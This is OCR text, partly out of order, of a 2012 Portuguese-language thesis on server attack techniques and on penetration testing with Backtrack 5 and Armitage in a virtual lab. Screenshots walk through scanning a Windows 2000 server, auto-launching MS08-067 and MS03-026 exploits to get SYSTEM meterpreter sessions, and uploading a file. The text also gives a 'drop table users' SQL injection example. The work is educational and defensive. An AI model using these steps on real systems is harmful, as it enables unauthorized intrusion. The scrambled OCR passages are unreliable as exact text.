Home
centro estadual de educação tecnológica paula souza
Contents
1. Applications Places System E Wed Nov 7 11 18 AM I Look In lj Desktop Console X nmap File Name arquivo txt Files of Type All Files Name D Arquivos de pr Documents an geen Cancel man Open selected file AUTOEXEC BAT Ob Paotfant hin Akh Upload Make Directory List Drives Refresh root bt Figura 3 20 Enviando arquivo ao servidor invadido Fonte Elaborado pelos autores 2012 56 18 Comprove o envio do arquivo no servidor Windows no diret rio C Disco local C Arquivo Editar Exibir Favoritos Ferramentas Ajuda EH voltar EB Pesquisar Pastas EB Hist rico Sexo E Endere o Disco local C o Ir Arquivos de Documents and Inetpub WINNT programas Settings b Disco local C Selecione um item para exibir sua descri o arquivo R Capacidade 19 9 GB E Usado 2 24 GB O Livre 17 7 GB 5 objeto s mais 2 ocultos 48 bytes IS Meu computador Ainiciar amp a Gl pisco local C BI m ias Figura 3 21 Tela com arquivo enviado ao servidor Fonte Elaborado pelos autores 2012 Neste caso como pode ser notado na figura 3 16 a aplica o encontrou e explorou duas vulnerabilidades no servidor testado s o elas a ms03 026 dcomea ms08 067 netapi a primeira uma vulnerabilidade que foi explorada pelo buffer overflow na interface Remote Proc
2. Applications Places System d PZ Tue Nov 13 11 18 PM Armitage View Hosts Attacks Workspaces Help gt E auxiliary gt exploit payload gt post 10 0 2 16 x Progress Launching Exploits 10 0 2 16 80 windows http osb_uname_jlist Console X nmap X Cancel 1 Finding exploits via local magic 10 0 2 16 Found 275 exploits 2 Sorting Exploits 3 Launching Exploits E root bt fe Armitage Figura 3 23 Aplicando exploits no sistema atualizado Fonte Elaborado pelos autores 2012 58 Applications Places System gt dd PZ Tue Nov 13 11 20 PM v x Armitage Armitage View Hosts Attacks Workspaces Help a auxiliary gt exploit E payload gt post Console x nmap X Hail Mary x 4 Listing sessions sf gt sessions v Active sessions No active sessions msf gt E rootobt Figura 3 24 Nenhuma vulnerabilidade encontrada Fonte Elaborado pelos autores 2012 3 6 SEGUNDO TESTE UTILIZANDO O ARMITAGE No segundo teste foram seguidos os mesmos passos do primeiro s que desta vez na m quina alvo 2 sistema Linux 12 10 e como pode ser notado os resultados foram diferentes e como mostram as figuras 3 25 e 3 26 nenhuma vulnerabilidade foi encontrada N Applications Places System 7 Sat Nov 10 5 41 PM ER Armitage View Hosts Attacks Wor 10 0 7 16 x Progress L
3. Armitage View Hosts Attacks gt 8 auxiliary exploit gt 10 0 2 16 x Progress Launching Exploits 10 0 2 16 80 windows http umbraco_upload_aspx Console x nmap X JH 1 Finding exploits via local magic 10 0 2 16 Found 275 exploits Sorting Exploits Launching Exploits E root bt fe Armitage Figura 3 14 Aplicando Exploits Fonte Elaborado pelos autores 2012 53 12 Ao terminar observe o icone ficou vermelho com alguns raios sobre ele Isso significa que o Armitage j aplicou um exploit e invadiu o servidor N Applications Places em r Wed Nov 7 11 15 AM 2 De v x Armitage Armitage View Hosts Attacks Workspaces Help 8 auxiliary exploit gt a ER post gt E post 10 0 2 16 Console X nmap X Hail Mary X Id Type Information Connection Via 1 meterpreter x86 win32 AUTORIDADE NT SYSTEM SERVIDOR GIGATR 10 0 2 15 46100 gt 10 0 2 16 26906 10 0 2 16 exploit windows smb ms08_067_netapi 2 meterpreter x86 win32 10 0 2 16 23629 10 0 2 16 exploit windows dcerpc ms03 026 dcom 10 0 2 15 58384 gt Meterpreter session 2 opened 10 0 2 15 58384 gt 10 0 2 16 23629 at 2012 11 07 11 15 45 0200 msf gt _ root bt fe Armitage he Figura 3 15 Tela final de aplica o de exploits Fonte Elaborado pelos autores 2012 13 Para comprovar a invas o clique com o bot o direito sobr
4. E root bt e Armitage J w Figura 3 30 Resultado Final do Armitage no teste com firewall Fonte elaborado pelos autores 2012 64 CONCLUSAO Os tipos ou t cnicas de penetra o de um servidor de rede sao as mais diversas possiveis e podem ser feitas de diversas formas Al m disso novas amea as aparecem com novos servi os e sistemas Ha de se considerar ainda que invasores sao pessoas experientes habeis e que nao se cansam de estudar e pesquisar geralmente autodidatas novas ferramentas e t cnicas Portanto o profissional respons vel pela seguran a de redes deve estar atento e buscar constantemente melhorias de seguran a para sua rede lembrando que qualquer servi o que seja instalado em um servidor ser um ponto de vulnerabilidade a mais uma vez que abre uma porta de comunica o ent o uma configura o correta e com apenas os servi os estritamente necess rios essencial para elevar o n vel de seguran a em um servidor Mesmo tendo toda seguran a poss vel nos sistemas e servi os preciso lembrar que quem cria e mant m estes sistemas e servi os s o seres humanos e que como tal possuem fraquezas e s o sem sombra de d vida vulner veis o que torna o mais perfeito sistema de seguran a vulner vel se n o houver uma forte confidencialidade por quem det m as chaves do sistema Confiar plenamente na seguran a que se tem pode ser o maior dos erros quando se trata de seguran a Vale lembrar ainda q
5. O DE SERVI O Segundo Smith 2005 os Denial of Service DoS tamb m conhecidos como ataques de nega o de servi o s o ataques que n o s o considerados como uma invas o de sistema pois apenas visam sobrecarregar os recursos de mem ria ou processamento de algum servidor escolhido como alvo Normalmente estes alvos s o m quinas de servidores de grandes empresas Os DoS sobrecarregam a m quina enviando v rios pacotes de requisi es ao mesmo tempo para uma determinada m quina visando faz la travar ou at reiniciar por sobrecarga de tarefas dependendo do sistema operacional utilizado por ela deixando assim os servi os disponibilizados por esta m quina indispon vel por um bom tempo Para exemplificar isso de forma mais clara podemos utilizar o exemplo das propagandas vistas na televis o onde um produto oferecido a um pre o tentador logicamente que sabendo disso v rias pessoas tentaram ligar ao mesmo tempo sobrecarregando a operadora de telefonia durante este tempo impedindo que liga es quele destino sejam efetivadas enquanto esta grande quantidade de 30 pessoas estiver tentando acessar este mesmo numero ao mesmo tempo Seguindo ainda o raciocinio de Smith 2005 al m dos DoS existem os Distributed Denial of Service DDoS que s o a jun o de nega o de servi o com introdu o distribu da ou seja os ataques de DDos podem ser considerados como v rios ataques DoS Portanto s o ataques de DoS em grande esc
6. CAQ 32 2r NIS Teasa A ai 32 CIR TOO E a a A S 34 CESAR RG ff 8 VANDER peann AAAA 36 2A OWASP E irc pa Ed cous a ea 38 3 APLICA O DA BACKTRACK EM TESTES DE PENETRA O DE SERVIDORES DE REDE ss s sssssnsnsnsnsisisisisisisisisisisisiiiiiririririririririririririreens 40 SV ETAPAS DOM ESTE aus ip ap e a e aiaei 40 3 1 1 Coleta de Informa es beatae da dn dd DU dessa 41 3 1 2 Analisando as Poss veis Vulnerabilidades 42 3 1 3 Confirmando a Vulnerabilidade 43 3 1 4 Explorando a Vulnerabilidade 43 3 1 5 Consolidando a Invas o assar Aca a IRES alone ect 44 3 1 6 Finalizando o teste seas Esses dana Gate mi ahead 45 3 2 ENTENDENDO O ARMITAGE a 45 3 3 CEN RIO DE MES WES sus ms REL DES t 46 3 4 PRIMEIRO TESTE UTILIZANDO O ARMITAGE u 47 3 5 CORRIGINDO AS VULNERABILIDADES E REPETINDO OS TESTES 56 3 6 SEGUNDO TESTE UTILIZANDO O ARMITAGE 58 3 7 TESTANDO A PROTE O DE UM FIREWALL 59 3 7 1 Configura o da Rede de Testes ssa 60 3 7 2 Configura o do Firewall Debian 6 05 renas 61 3 8 APLI
7. Virtual Machine DDoS Distributed Denial of Service DLL Dynamic link library DNS Domain Name System DoS Denial of Service NIST National Institute of Standards and Technology OISSG Open Information Systems Security Group OSSTMM Open Source Secutory Testing Methodology Manual OWASP Open Web Application Security Project RST reset RPC Remote Procedure Call RVA Risk Value Assessment SQL Structured Query Language ou Linguagem de Consulta Estruturada SYN synchronize SSH Secure Shell TCP Transmission Control Protocol TTL Time To Live UDP User Datagram Protocol SUMARIO INTRODU O u a n dt a ama MA ise go 14 1 T CNICAS DE ATAQUES A SERVIDORES DE REDE 16 1 1 COLETA DE INFORMA ES NOS SERVIDORES E MAPEAMENTO DA REDE O TS UI Taine GR aaa as 17 1 1 1 Vasculhando Informa es nos Servidores DNS 17 1 1 2 Descobrindo Endere os IP ars 18 1 1 3 Tragando a Rota at os Servidores aa 20 1 1 4 Descobrindo Servi os em Execu o aa 21 1 2 T CNICAS DE PENETRAQCAQO I aaa aaa 23 1 3 ELEVA O OU ESCALADA DE PRIVIL GIO aa 25 1 4 T CNICAS PARA MANTER O ACESSO E APAGAR RASTROS 27 1 5 ATAQUES DE NEGA O DE SERVI O cccccccccesesesescssesesesessstseeeesereateeneneass 29 2 METODOLOGIAS DE TESTE DE PENETRA
8. nio do Google A sintaxe utilizada dnsmap Google com e como resposta obteve se todos os endere os IP de servidores que disponibilizam servi os do dom nio pesquisado inclusive com tr s deles j utilizando o IPv6 entretanto isso n o significa que todos est o ativos neste momento para isso utilizado o comando a seguir 1 1 2 Descobrindo Endere os IP Outra ferramenta indispens vel na busca por informa es sobre alvo o FPING que tamb m faz parte do pacote Backtrack 5 O que esta ferramenta faz enviar uma solicita o Internet Control Message Protocol ICMP para todos os endere os dentro da faixa de IP solicitada ou seja como enviar um comando ping para cada endere o IP que quiser consultar para saber se este computador est ativo ou n o entretanto este comando faz isso de forma autom tica e o retorno resposta pode ser armazenado em arquivo para posterior consulta a figura 1 2 19 mostra a tela de retorno da ferramenta Fping Como as consultas est o sendo feitas pela internet esta ferramenta far uma varredura dos endere os IP v lidos do alvo em quest o e com o retorno desta consulta juntamente com a consulta do Dnsmap podemos descobrir quais s o os IP v lidos que est o de frente para a internet e dentre esses quais s o servidores BACKTRACK 2012 Apesar de ser uma ferramenta interessante ela pode ser facilmente detectada pelo administrador da rede uma vez que fica registrado o og da c
9. os etc Assim iniciamos esta etapa no teste de varredura do servidor pois mesmo o administrador conhecendo os servi os nos seus servidores este teste se faz necess rio para certificar que nenhum outro servi o estranho esteja executando nos servidores o que poderia ser um ind cio de que o servidor j estivesse sido comprometido Neste teste a ferramenta mais utilizada o j conhecido Nmap uma ferramenta que faz a varredura do servidor e retorna com o mapeamento completo do mesmo mostrando qual sistema operacional est em uso sua vers o e quais os servi os est o dispon veis na m quina alvo bem como quais portas est o sendo usadas por estes servi os e os protocolos por eles utilizados No Backtrack 5 o Nmap pode ser utilizado de diversas formas modo gr fico simples no modo gr fico com Zenmap que j vem com par metros pr definidos para usu rios menos experientes como linha de comando simples ou ainda com aux lio de scripts como o caso do exemplo a seguir que utiliza o script smb check vulns para verificar as vulnerabilidades j conhecidas Sua sintaxe nmap v script smb check vulns 10 0 2 16 A figura 3 1 mostra o resultado da pesquisa 42 Figura 3 1 Resultado da ferramenta Nmap no Backtrack 5 Fonte Elaborado pelos autores 2012 3 1 2 Analisando as Possiveis Vulnerabilidades O segundo passo analisar as informa es que foram dadas pelo Nmap Como podemos notar no test
10. vel em lt http www backtrack linux org tutorials gt Acesso em 05 abr 2012 BORGES C G Estudo comparativo de metodologias de pentests 2011 TCC Pos gradua o em seguran a de Sistemas Universidade Luterana do Brasil Campus Canoas Canoas RS BUENO F S Silveira Bueno Dicion rio da l ngua Portuguesa S o Paulo FTD 2000 CERT Centro de Estat sticas Respostas e Tratamentos de Incidentes 2012 Dispon vel em lt http www cert br stats incidentes gt Acesso em 14 mar 2012 FAIRCLOTH J Penetration Tester s Open Source Toolkit 3 ed Waltham Syngress 2011 ISECOM Institute For Security And Open Methodologies Open Source Security Testing Methodology Manual OSSTMM v3 0 2010 Dispon vel em lt http www isecom org mirror OSSTMM 3 pdf gt Acesso em 20 jul 2012 LIEIRA J F Seguran a de Redes 2011 87p Apostila da disciplina de Seguran a de Redes Faculdade de Tecnologia de Lins MITNICK K D SIMON W L A arte de invadir S o Paulo Pearson 2006 NESSUS Guia do Usu rio Nessus 5 0 2012 Disponivel em http static tenable com documentation nessus 5 0 user guide PTB pdf gt Acesso em 14 mar 2012 NIST Technical Guide to Information Security Testing and Assessment 2008 Dispon vel em lt http csrc nist gov publications nistpubs 800 115 SP800 115 pdf gt Acesso em 17 jul 2012 OISSG Open Information Systems Security Group Information System Security Assessment Framewo
11. 6 381 artigos em seu s tio eletr nico OWASP 2008 A metodologia OWASP trata da seguran a dos sistemas at mesmo antes do desenvolvimento propriamente dito e possui fase de teste para todo o processo desde projeto cria o implanta o e manuten o do sistema por m neste trabalho o que interessa a condu o do teste de penetra o em sistemas j em opera o e portanto n o aprofundado nas demais reas Na rea de teste de penetra o a metodologia baseia se na cnamada caixa preta onde o analista conhece muito pouco ou nada sobre o funcionamento interno do sistema a ser testado Visando facilitar os testes estes foram divididos em dez categorias sendo que cada categoria possui um n mero de testes associados s o eles OWASP 2008 39 Coleta de informa es primeira etapa a ser executada e visa obter o m ximo de informa es a respeito da aplica o a ser testada Possui seis testes Gerenciamento de configura o foca em quest es arquiteturais do software como transmiss o e forma de armazenamento de dados configura o e ger ncia de infra estrutura Possui oito testes L gica de neg cio Verifica se a aplica o se comporta corretamente quando o usu rio executa opera es fora do convencional Possui um teste Autenticagao Testa o correto funcionamento dos processos de configura o das identidades dos usu rios Possui dez testes Autoriza o verifica se o sistema
12. AM File Edit View Terminal Help x Start Metasploit A Metasploit RPC server is not running or not accepting connections yet Would you like me to start Metasploit s RPC server for you Luo J wes root bt Figura 3 7 iniciando o Metasploit no Bactrack 5 r3 Fonte Elaborado pelos autores 2012 5 Aguarde o Armitage carregar N Applications Places System 7 Wed Nov 7 11 05 AM File Edit View Terminal Help x Progress Connecting to 127 0 0 1 55553 java net ConnectException Connection refused Cancel E root bt Figura 3 8 Conectando ao banco do metasploit no Bactrack 5 r3 Fonte Elaborado pelos autores 2012 49 6 Ap s o carregamento inicia se a tela principal do Armitage Applications Places System F Wed Nov 7 11 07 AM 2 Norkspaces Help auxiliary gt E exploit gt 8 payload post Console x ao 927 exploits 499 auxiliary 151 post 251 payloads 28 encoders 8 nops msf gt E root bt fe Armitage Figura 3 9 Tela inicial do Armitage no Bactrack 5 r3 Fonte Elaborado pelos autores 2012 7 Aplicando o Intense scan no alvo Acesse o menu Hosts gt Nmap Scan gt Intense Scan N Applic Places System 5 Wed Nov 7 11 09 AM 2 Import Hosts gt B auxiliary amp Add Hosts gt exploit gt B payload gt post DNS Enu
13. a execu o das avalia es tamb m discute a an lise do processo e fornece recomenda es para coletar armazenar transmitir e apagar dados sobre a avalia o 34 Atividades p s teste esta se o com base nos resultados dos testes e analisando as descobertas visa orientar as organiza es a agir tomando as provid ncias necess rias para obterem um n vel maior de seguran a de suas informa es 2 2 ISSAF O framework para Avalia o de Seguran a de Sistemas de Informa o ISSAF uma metodologia criada em 2006 pelo Open Information Systems Security Group OISSG organiza o sem fins lucrativos que visa prover conhecimentos de seguran a da informa o e formado por profissionais da rea de diversas partes do mundo A vers o atual a 0 2 1 sendo um framework de distribui o e utiliza o gratuita inclusive para organiza es comerciais desde que mantido o copyright OISSG 2006 Esta metodologia uma das mais extensas seu conte do completo tem mais de 1200 p ginas e seus autores acreditam que melhor fornecer toda a informa o que o profissional possa precisar para os testes do que restringi las a somente os objetivos principais Cada etapa dos testes tem detalhadas instru es para execu o e quais os resultados esperados OISSG 2006 A estrat gia da ISSAF dividida em tr s fases Planejamento e Prepara o Antes da execu o dos testes na fase de planejamento preciso
14. as debilidades da infra estrutura dos sistemas de informa o necess rias execu o com seguran a dos processos de neg cios da empresa Realizar avalia es de vulnerabilidades e testes de penetra o para identificar as falhas de sistemas aplica es e redes e priorizar as avalia es segundo crit rios de criticidade custos e benef cio potencial OISSG 2006 Organiza o Segundo OISSG 2006 a metodologia SSAF esta dividida em 4 grupos de avalia o t cnica de seguran a e cada grupo subdividido em diversos t picos mais espec ficos de sua rea Cada um destes t picos descrito com uma estrutura b sica e como j descrito anteriormente cada um tem introdu o objetivos resultados esperados listas de testes e contra medidas entretanto como se trata de uma metodologia muito extensa descrevemos abaixo apenas os 4 grupos gerais S o eles Seguran a de Rede roteador firewall senha switches rede privativa virtual antiv rus sistema de detec o de intrus o armazenamento de dados rede sem fio usu rio de internet AS 400 e aplicativos Lotus Notes Seguran a de Host seguran a de sistemas Unix Linux Windows Novell Netware e servidores de internet Seguran a de aplica o abrange aplica es de internet inclusive inje es de SQL auditoria de c digo fonte auditoria em arquivos bin rios e lista de checagem de avalia o de seguran a da aplica o 36 Seguran a de B
15. conhecidas tais como o http cve mitre que um site internacional livre e de uso p blico que as nomeia e classifica vulnerabilidades sendo um verdadeiro dicion rio sobre as vulnerabilidades O http www first org cvss que oferece o Sistema Comum de Pontua o de Vulnerabilidade ou Common Vulnerability Scoring System CVSS SIG um sistema que analisa e pontua utilizando um m todo universal e padronizado para avalia o de vulnerabilidades Existe ainda o http www sans org que que al m de boletins de seguran a oferece treinamentos on line sobre o assunto e por fim o http www securityfocus com que uma lista de discuss o sobre o tema e pode oferecer informa es valiosas sobre o assunto 3 1 3 Confirmando a Vulnerabilidade As vulnerabilidades apresentadas nem sempre s o de fato verdadeiras portanto necess rio confirm las A maneira mais correta de fazer isso tentar explor la Para isso deve se encontrar um exploit que explore a falha isso da mesma forma deve ser pesquisado em sites sobre o assunto uma boa refer ncia pode ser o http metasploit com Encontrado um exploit que explore a falha o pr ximo passo ser a sua aplica o Este um processo bastante trabalhoso pois dependendo do exploit pode ser necess rio por exemplo compil lo em um sistema Unix o que requer um conhecimento sobre o assunto Entretanto existem ferramentas que fazem este trabalho de forma autom tica e que ser o utilizad
16. de cr dito Normalmente esses ataques aparentam ser de institui es financeiras PING O Ping funciona de forma parecida a um sonar por m no mundo virtual este comando envia pacotes ICMP de dados de 32 bits ao computador destino e solicita resposta Se a resposta voltar significa que houve comunica o e que o 71 computador destino esta ativo al m disso o tempo de resposta medido visando conhecer a velocidade da rede naquele instante ROOTKIT Programa ou um conjunto de programas usado por um atacante para ocultar sua presen a em um determinado sistema e permitir seu acesso futuro SENHA Conjunto de caracteres de conhecimento nico do usu rio utilizado no processo de verifica o de sua identidade SOFTWARE Uma sequ ncia de instru es a serem seguidas e ou executadas na manipula o redirecionamento ou modifica o de um dado informa o ou acontecimento ou seja um programa de computador SPAM Termo usado para se referir aos emails n o solicitados que geralmente s o enviados para um grande n mero de pessoas Quando o conte do exclusivamente comercial este tipo de mensagem tamb m referenciado como UCE do Ingl s Unsolicited Commercial E mail SQL Structured Query Language ou Linguagem de Consulta Estruturada uma linguagem de pesquisa declarativa para banco de dados relacional base de dados relacional TROJANS S o programas aparentemente inofensivos
17. es rec procas Mas o engenheiro social aplica essas t cnicas de uma maneira manipuladora enganosa altamente anti tica frequentemente com efeito devastador SAGARIN apud MITNICK 2006 p 189 Assim o atacante consegue retirar de forma inescrupulosa informa es importantes de maneira t o natural que o informante sequer se da conta do que est fazendo Outra forma de conseguir informa es do alvo pesquisar por meio de sites na internet como o Google por exemplo ou ainda por meio de pesquisas nos rg os oficiais de registro de dom nios no caso do Brasil o registro br LIEIRA 2011 Entretanto apesar de serem estas as fontes mais comuns de busca por informa es sobre poss veis servidores alvos o que sem d vida renderia uma boa pesquisa sobre o assunto este n o o foco deste trabalho mas sim as t cnicas utilizadas diretamente contra os servidores de rede Diversos s o os tipos de ataque entretanto entre os que s o dirigidos diretamente aos servidores analisaremos os mais comuns e cujas ferramentas para teste fazem parte do pacote Backtrack 5 17 1 1 COLETA DE INFORMA ES NOS SERVIDORES E MAPEAMENTO DA REDE Quando se pensa em um ataque servidores e prov vel invas o o primeiro passo obter o m ximo poss vel de informa es sobre o alvo como por exemplo os endere os Internet Protocol IP dos servidores quais servi os est o sendo executados nos servidores qual o sistema operacional q
18. marketing 5 regras Avalia o estimativa de entrega 2 regras Contratos e negocia es 9 regras Escopo 2 regras Plano de testes 1 regra Processo de testes 11 regras Relat rios 12 regras O OSSTMM tamb m destaca que um computador pode at ficar mais lento de acordo com o volume de tarefas que tem para executar entretanto n o esquece nenhuma delas e nem deixa de realiz las por seu bel prazer diferentemente do ser humano que al m de esquec las pode simplesmente deixar de realizar alguma delas simplesmente por n o julg la necess ria Portanto para a realiza o de um teste necess rio antes de tudo um planejamento bem feito e al m disso que seja realizado seguindo criteriosamente o que foi definido uma vez que os testes s o 37 complexos e portanto devem ser tratados por partes para que nada fique sem ser executado Para que isso seja feito de forma correta o OSSTMM define os tipos de testes como ISECOM 2010 Blind o tipo de teste onde o analista nao tem conhecimento sobre os canais defesa e ativos do alvo entretanto o alvo tem conhecimento detalhado da auditoria que ser realizada Esta categoria al m de tudo testa o conhecimento do analista de seguran a Double Blind neste tipo de teste assim como no Blind o analista n o disp e das informa es sobre os ativos canais e defesa do alvo entretanto o alvo tamb m n o tem informa es sobre o escopo do teste portanto visa testar a
19. nova jornada vislumbrada gra as aos ensinamentos recebidos e amizades conquistadas expresso meus sinceros agradecimentos ao Professor Me Julio Fernando Lieira meu orientador que com sua sapi ncia soube guiar me na realiza o deste trabalho Ao companheiro de autoria Jean Karl da Silveira meu agradecimento e respeito pela parceria neste trabalho Aos demais Professores e amigos de turma deixo tamb m meus agradecimentos pela amizade companheirismo e conhecimentos transmitidos Mario Fernandes Testoni Junior RESUMO Com esse estudo objetivou se conhecer os tipos de ataques mais comuns a servidores bem como as t cnicas e ferramentas utilizadas pelos invasores para obter informa es sobre o alvo e tentar a possivel invasao Al m disso foi feito um breve relato sobre as metodologias mais utilizadas para teste de penetracao Procurou se tamb m conhecer o Backtrack 5 r3 que uma distribui o Linux focada em teste de seguran a e de penetra o para concluir se um administrador de redes com estes conhecimentos pode testar e fortalecer a seguran a de seus pr prios servidores Para tanto foi criado um ambiente de testes com dois servidores virtualizados sendo um com sistema operacional Windows 2000 server e outro com sistema operacional linux Ubuntu 12 10 e neles aplicados os conhecimentos adquiridos para comprova o de sua efici ncia Finalizando concluiu se que a Backtrack se mostrou um bom aliado ao administrador de rede
20. o intuito de dirimir possiveis duvidas que possam surgir durante sua leitura ATACANTE Pessoa respons vel pela realiza o de um ataque ATAQUE a tentativa bem ou mal sucedida de acesso ou uso n o autorizado a um programa ou computador Tamb m s o considerados ataques as tentativas de nega o de servi o DoS ATAQUES DE FOR A BRUTA Brutal Force S o estrat gias utilizadas para descobrir senhas consiste em uma busca exaustiva feita por meio de algoritmos tentando encontrar todas as combina es poss veis at se descobrir a senha correta BACKDOOR C digo malicioso que abre caminho para o acesso remoto a um computador contaminado sem o conhecimento do usu rio CAVALO DE TR IA Trojan Horse um programa que se mascara ou aparenta possuir um prop sito benigno mas que arbitrariamente realiza fun es maliciosas C DIGO MALICIOSO Termo gen rico que se refere a todos os tipos de programa que executam a es maliciosas em um computador CRIPTOGRAFIA M todo de embaralhar ou codificar dados para impedir que usu rios n o autorizados os leiam ou adulterem usada dentre outras finalidades para autenticar a identidade de usu rios autenticar transa es banc rias proteger a integridade de transfer ncias eletr nicas de fundos e proteger o sigilo de comunica es pessoais e comerciais DDOS Distributed Denial of Service Ataque de nega o de servi o distribu do
21. ou 69 seja um conjunto de computadores utilizado para tirar de opera o um ou mais servi os ou computadores conectados Internet DESKTOPS Computadores de uso pessoal ou como terminais de rede DNS Domain Name System Servi o que traduz nomes de dom nios para endere os IP e vice versa ENDERE O P N mero unico para cada computador conectado Internet composto por uma sequ ncia de quatro n meros que variam de O at 255 separados por Por exemplo 192 168 34 25 ENGENHARIA SOCIAL M todo utilizado pelos invasores para induzir os usu rios a realizarem uma a o que normalmente resulta em consequ ncias negativas como o download de malware ou a divulga o de informa es pessoais Ataques de phishing exploram essa metodologia EXPLOIT Programa que se aproveita das vulnerabilidades de um sistema operacional para instalar um payload FIREWALL Dispositivo constitu do pela combina o de software e hardware utilizado para dividir e controlar o acesso entre redes de computadores HANDSHAKE Ou aperto de m o o processo pelo qual duas m quinas afirmam uma a outra que a reconheceu e est pronta para iniciar a comunica o INVAS O Ataque bem sucedido que resulte no acesso manipula o ou destrui o de informa es em um computador INVASOR Pessoa respons vel pela realiza o de uma invas o ou pelo comprometimento do computador LISTENING Signi
22. para o servidor Web do Windows Server 2000 Desta forma o firewall libera apenas o que foi definido nas regras e bloqueia tudo o que n o estiver especificado Por fim a terceira regra uma regra de estado respons vel por liberar a passagem da resposta do servidor Web do Windows Server 2000 para os clientes que solicitaram conex o 3 8 APLICA O DO TESTE NA REDE PROTEGIDA COM FIREWALL Testado o funcionamento da rede e do servidor web foram iniciados os testes de penetra o da mesma forma que os anteriores Desta vez foi poss vel notar que o Backtrack identificou o alvo como sendo um sistema Windows figura 3 29 isso porque apesar da consulta ter sido feita m quina Debian esta redirecionou a requisi o atrav s das regras do firewall ao servidor web que retornou com a resposta solicitada pelo atacante Foi poss vel notar tamb m que apesar do servidor ter diversas portas abertas como visto no teste anterior a nica detectada desta vez foi a porta 80 pois o teste foi dirigido ao firewall e n o ao servidor web e o firewall n o possui outras portas abertas nem vulnerabilidades conhecidas Por meio deste resultado j foi poss vel notar que o Firewall est protegendo o servidor pois n o permitiu que o teste do atacante mostrasse as vulnerabilidades existentes no mesmo entretanto visando confirmar o que j se mostra evidente foi finalizado o teste de invas o aplicando os exploits existentes para este servi o e sis
23. para ser executado pelo programa entretanto este tipo de ataque exige conhecimento profundo em programa o para criar um expoit em linguagem de baixo n vel como o assembler al m disso preciso informa es corretas do sistema operacional e do programa que ser usado para causar o overflow Apesar de ser um ataque dif cil de se evitar tamb m o para ser executado mas quando se trata de seguran a n o pode deixar de ser considerado ASSUN AO 2010 Segundo Assun o 2010 outro ataque muito utilizado atualmente o Structured Query Language SQL Injection que na verdade uma falha de um programa que interage com o banco de dados SQL e n o falha do banco como pensam algumas pessoas O ataque consiste em explorar uma falha do programa que n o interpreta corretamente alguns caracteres especiais como barra e aspas simples permitindo desta forma que sejam inclu dos comandos de banco de dados onde deveria entrar dados simplesmente por que n o s o filtrados de forma correta e com isso o atacante consegue muitas vezes acesso completo ao banco de dados 25 O que acontece na pratica que se no campo usuario o invasor digitar por exemplo pe dro com aspas simples no meio do nome o sistema entende a aspas como quebra da string e aceita o restante dro como comando o que neste caso causaria um erro por m se o atacante digitar drop table users toda a tabela de usu rios seria apagada impedindo o acesso
24. um profundo conhecimento das ferramentas utilizadas e sua sintaxe podendo ser aplicado de forma diferente em cada caso desde que siga uma metodologia e seja documentado Os testes a seguir foram feitos individualmente em cada um dos servidores inicialmente no servidor Windows e em seguida no servidor Linux Cada um deles foi repetido duas vezes visando retificar ou ratificar os resultados obtidos como segue 1 Inicie normalmente o BackTrack Wed Nov 7 11 04 AM amp lt lt back track 15 Figura 3 4 Tela inicial do Bactrack 5 r3 Fonte Elaborado pelos autores 2012 2 Abra um novo Shell e digite armitage Este comando vai iniciar o Armitage abrindo a sua janela de conexao N Applications Places System f Wed Nov 7 11 04 AM aR A x root bt File Edit w Terminal Help Figura 3 5 Iniciando Armitage do Bactrack 5 r3 Fonte Elaborado pelos autores 2012 3 Nesta janela preserve os dados iniciais e clique em Connect Applications Places System F t Wed Nov 7 11 05 AM BR File Edit View Terminal Help msf test Connect Help connect Heie Connects to Metasploit root bt Figura 3 6 Tela inicial do Armitage no Bactrack 5 r3 Fonte Elaborado pelos autores 2012 48 4 O Armitage pergunta se voc deseja iniciar o servidor Metasploit Basta confirmar a a o clicando em Yes N Applications Places System gt Wed Nov 7 11 05
25. 0 86 197 54 066 ms 57 992 ms 61 449 ims 3 200 100 1 173 dsl telesp net br 200 100 1 173 65 782 ms 187 100 61 81 dsl telesp net br 187 100 61 81 64 364 ms 200 100 1 169 dsl telesp net br 200 1 00 1 169 65 550 ms 4 187 100 57 81 dsl telesp net br 187 100 57 81 70 013 ms 200 100 98 161 di al up telesp net br 200 100 98 161 71 176 ms 187 100 59 2 dsl telesp net br 187 100 59 2 72 263 ms 5 94 142 103 73 94 142 103 73 155 289 ms 176 52 252 197 176 52 252 197 7 5 736 ms xe 1 0 0 grtsaneml red telefonica wholesale net 84 16 9 93 80 207 ms 6 Xel2 0 4 0 grtmiabr3 red telefonica wholesale net 94 142 117 34 204 403 m s Xe2 1 0 0 grtfortwl red telefonica wholesale net 94 142 123 158 94 550 ms 93 667 ms 7 176 52 250 246 176 52 250 246 162 999 ms 162 142 ms 176 52 249 154 176 52 249 154 164 984 ms 8 GOOGLE xe 6 1 0 0 grtmiana3 red telefonica wholesale net 84 16 6 118 231 132 ms GOOGLE xe 7 1 0 0 grtmiana3 red telefonica wholesale net 84 16 6 114 2 21 334 ms 220 994 ms 9 209 85 253 118 209 85 253 118 187 707 ms 209 85 253 74 209 85 253 74 1 94 775 ms 191 053 ms 10 209 85 254 252 209 85 254 252 171 651 ms 216 239 48 192 216 239 48 192 173 644 ms 209 85 254 252 209 85 254 252 167 924 ms 11 72 14 239 65 72 14 239 65 200 206 ms 196 416 ms 72 14 239 67 72 14 239 67 202 232 ms 12 72 14 234 65 72 14 234 65 230 160 ms 72 14 234 67 72 14 234 67 209 056 Figura 1 3 Resultado da ferramenta Traceroute no B
26. CA O DO TESTE NA REDE PROTEGIDA COM FIREWALL 62 CONCLUS O str A eaten Sut a suhu es 64 REFERENCIAS BIBLIOGR FICAS ll nn arar 66 CLOSSARIO men usut u ubah mauka SSC Pe 68 14 INTRODU O certo que a tecnologia da informa o est presente em todos os segmentos da sociedade tais como as redes financeiras sistemas de comunica o controle e gera o de energia e sistemas de sa de todos s o dependentes de sistemas computacionais para funcionar Sendo assim grande o n mero de pessoas que utilizam computadores pessoais para educa o entretenimento compras e transa es banc rias O advento da internet possibilitou in meras facilidades no dia a dia das pessoas como o correio eletr nico e a pr pria navega o na Web permitindo o acesso an nimo a quase todo tipo de informa o ou sistema Nesse contexto n o causa espanto o fato de que essa revolu o computacional tenha atingido tamb m o mundo do crime Segundo o Centro de Estudos Respostas e Tratamento de Incidentes de Seguran a no Brasil CERT em 2011 houve mais de 399 mil incidentes reportados espontaneamente um aumento de 279 em rela o a 2010 ou seja se forem computados os incidentes que n o s o reportados esse n mero torna se ainda mais assustador CERT 2012 Dessa maneira esse aumento dram tico em tentativa de invas es a sistemas faz com que as autarquias corpora es e empresas em geral
